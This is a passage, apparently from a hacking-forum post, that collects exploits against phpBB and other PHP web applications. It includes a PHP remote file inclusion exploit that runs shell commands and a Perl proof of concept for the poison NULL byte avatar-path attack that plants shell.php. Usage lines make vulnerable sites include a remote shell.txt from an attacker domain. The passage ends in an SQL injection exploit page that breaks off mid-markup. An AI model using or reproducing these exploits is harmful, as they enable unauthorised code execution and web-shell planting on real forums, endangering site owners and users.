if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } if ($proxy=='') {$p='http://'.$host.':'.$port;} $packet ="GET ".$p."admin/modules_data.php?phpbb_root_path=".$shell."?cmd=".$cmd."%00 HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpackets($packet); if (strstr($html,"hauru")) { $temp=explode("hauru",$html); die($temp[1]); } echo "Exploit err0r :("; echo "Go to DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam"; ?> # milw0rm.com [2006-10-30] tonyan(HCE) phpBB <= 2.0.21 (Poison NULL Byte) Remote Exploit Xploit: Code: #!/usr/bin/perl -w # Author: ShAnKaR # Title: multiple PHP application poison NULL byte vulnerability # Applications: phpBB 2.0.21, punBB 1.2.12 # Threat Level: Critical # Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html # # Poison NULL byte vulnerability for perl CGI applications was described # in [1]. ShAnKaR noted, that same vulnerability also affects different # PHP applications. An example of vulnerable applications are phpBB and # punBB. # # Vulnerability can be used to upload or replace arbitrary files on # server, e.g. PHP scripts, by adding "poison NULL" (%00) to filename. # # In case of phpBB and punBB vulnerability can be exploited by changing # location of avatar file and uploading avatar file with PHP code in EXIF # data. # # A PoC exploit to change Avatar file location for phpBB: # # use HTTP::Cookies; use LWP; use URI::Escape; unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"} my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)'); $ua->cookie_jar( HTTP::Cookies->new()); $url='http://'.$ARGV[0].'/login.php'; $data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1"; my $req = new HTTP::Request 'POST',$url; $req->content_type('application/x-www-form-urlencoded'); $req->content($data); my $res = $ua->request($req); $res=$ua->get('http://'.$ARGV[0].'/login.php'); $content=$res->content; $content=~ m/true&sid=([^"]+)"/g; if($ARGV[4]){ $content=$res->content; print $content; } $url='http://'.$ARGV[0].'/login.php'; $data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1"; $req = new HTTP::Request 'POST',$url; $req->content_type('application/x-www-form-urlencoded'); $req->content($data); $res = $ua->request($req); $url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1; $data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00"; $req = new HTTP::Request 'POST',$url; $req->content_type('application/x-www-form-urlencoded'); $req->content($data); $res = $ua->request($req); if($ARGV[4]){ $content=$res->content; print $content; } black_hat_cr(HCE) phpBB XS <= 0.58 (functions.php) Remote File Include Vulnerability PHP Code: Vulnerable File: includes/functions.php Vulnerable Code: //The phpbb_root_path isn't initialize include_once( $phpbb_root_path . './includes/functions_categories_hierarchy. ' . $phpEx ); Method To Use: http://www.victim.com/[phpbb_xs]/includes/functions.php?phpbb_root_path =http://yourdomain.com/shell.txt? Xfile.hacker(HCE) HPBB2 PlusXL 2.72 Functions.PHP Remote File Include Vulnerability @http://www.example.com/includes/functions.php?phpbb_root_path="www.exam ple2.com" Black_hat_cr(HCE) PHPEasyData Pro 2.2.2 Remote SQL Injection Exploit PHPEasyData Pro 2.2.2 (index.php) Remote SQL Injection Exploit PHP Code: <% Response.Buffer = True %> <% On Error Resume Next %> <% Server.ScriptTimeout = 100 %> <% '========================================================== ===================================== '[Script Name: PHPEasyData Pro 2.2.2 (index.php) Remote SQL Injection Exploit '[Coded by : ajann '[Author : ajann '[Contact : :( '[ExploitName: exploit3.asp '[Note : exploit file name =>exploit3.asp '[Note : If Wrong Id = "CTYPE html PUBLIC see" '[Using : Write Target and ID after Submit Click '========================================================== ===================================== %> <% function guvenlik(username) guvenlik = Replace(username,"<sup>(37)</sup></span></span></span></span></ span></a>","") guvenlik = Replace(guvenlik,"(37)","") guvenlik = Replace(guvenlik,">","") End Function %> <html> <title>PHPEasyData Pro 2.2.2 (index.php) Remote SQL Injection Exploit</title> <head> <script language="JavaScript"> function functionControl1(){ setTimeout("functionControl2()",2000); } function functionControl2(){ if(document.form1.field1.value==""){ alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again"); } } function writetext() { if(document.form1.field1.value==""){ document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size =\"1\" color=\"#008000\">There is a problem The Data Didn\'t Take </font>' } } function write(){ setTimeout("writetext()",1000); } </script> </head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000 . http://www.victim.com/[phpbb_xs]/includes/functions.php?phpbb_root_path =http://yourdomain.com/shell.txt? Xfile .hacker( HCE) HPBB2 PlusXL 2.72 Functions.PHP Remote File Include Vulnerability @http://www.example.com/includes/functions.php?phpbb_root_path="www.exam ple2.com"